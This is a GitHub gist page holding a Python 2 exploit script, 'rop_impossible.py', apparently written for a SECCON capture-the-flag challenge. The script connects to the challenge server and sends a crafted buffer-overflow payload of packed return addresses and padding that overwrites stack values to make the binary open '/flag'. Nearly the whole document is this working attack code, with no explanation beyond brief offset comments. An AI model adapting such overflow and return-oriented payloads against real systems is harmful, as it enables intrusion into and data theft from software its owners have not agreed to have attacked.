Skip to content

Instantly share code, notes, and snippets.

@potetisensei

potetisensei/rop_impossible.py

Created December 7, 2014 09:45
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save potetisensei/946f51efb1ca91e85dcd to your computer and use it in GitHub Desktop.
Save potetisensei/946f51efb1ca91e85dcd to your computer and use it in GitHub Desktop.
Download ZIP
Raw
rop_impossible.py
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep
buf_clone = 0x080CB960
p = socket(AF_INET, SOCK_STREAM)
p.connect(("ropi.pwn.seccon.jp", 10000))
flag_addr = buf_clone + 264
payload = ""
payload += pack("<I", 0x08049322) # addr of buf_clone
payload += "a" * 200
payload += pack("<I", flag_addr) # ebp-0x44
payload += pack("<I", buf_clone) # ebp-0x40
payload += "a" * 8
payload += pack("<I", 0x080798C1) # ebp-0x34
payload += "a" * 36
payload += pack("<I", 0x0807D745) # ebp-0x10
payload += "/flag\x00\x00\x00" # ebp-0xC, addr of flag_addr
payload += "a" * 28
payload += pack("<I", buf_clone) # ebp+0x1C
payload += "a" * 4
payload += pack("<I", 0x7000000) # ebp+0x24
assert(len(payload) <= 0x200)
p.send(payload)
sleep(1)
p.shutdown(SHUT_WR)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment